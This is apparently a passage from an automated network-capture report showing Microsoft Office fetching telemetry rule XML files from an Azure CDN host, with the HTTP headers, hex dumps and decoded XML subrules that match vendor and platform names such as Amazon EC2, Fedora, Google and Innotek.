                                                                                                                                                                                                        2024-12-02 06:38:59 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        56192.168.2.84986013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:00 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                        x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063900Z-174f7845968qj8jrhC1EWRh41s000000141g000000003dgr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        57192.168.2.84986113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:00 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:01 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                        x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063901Z-174f7845968px8v7hC1EWR08ng000000146000000000frcw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        58192.168.2.84986213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:00 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:01 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                        x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063901Z-174f7845968frfdmhC1EWRxxbw00000014200000000092s0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        59192.168.2.84986313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:01 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                        x-ms-request-id: 8322dc88-e01e-00aa-270b-42ceda000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063901Z-174f7845968qj8jrhC1EWRh41s0000001420000000002eck
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        60192.168.2.84986413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:01 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                        x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063901Z-174f7845968psccphC1EWRuz9s000000146g00000000dyv7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:01 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        61192.168.2.84986513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:02 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:02 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                        x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063902Z-174f7845968ljs8phC1EWRe6en00000013yg000000003frs
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:02 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        62192.168.2.84986613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:03 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                        x-ms-request-id: e8f57c1b-901e-0016-2be4-41efe9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063903Z-174f78459685m244hC1EWRgp2c00000013ug00000000afsq
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        63192.168.2.84986713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:03 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                        x-ms-request-id: 3b640fd5-a01e-0053-6c1f-418603000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063903Z-174f78459684bddphC1EWRbht400000013pg00000000ft23
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        64192.168.2.84986913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:03 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                        x-ms-request-id: 9318b81d-501e-0035-5bd6-43c923000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063903Z-174f7845968psccphC1EWRuz9s000000146000000000f7ky
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        65192.168.2.84986813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
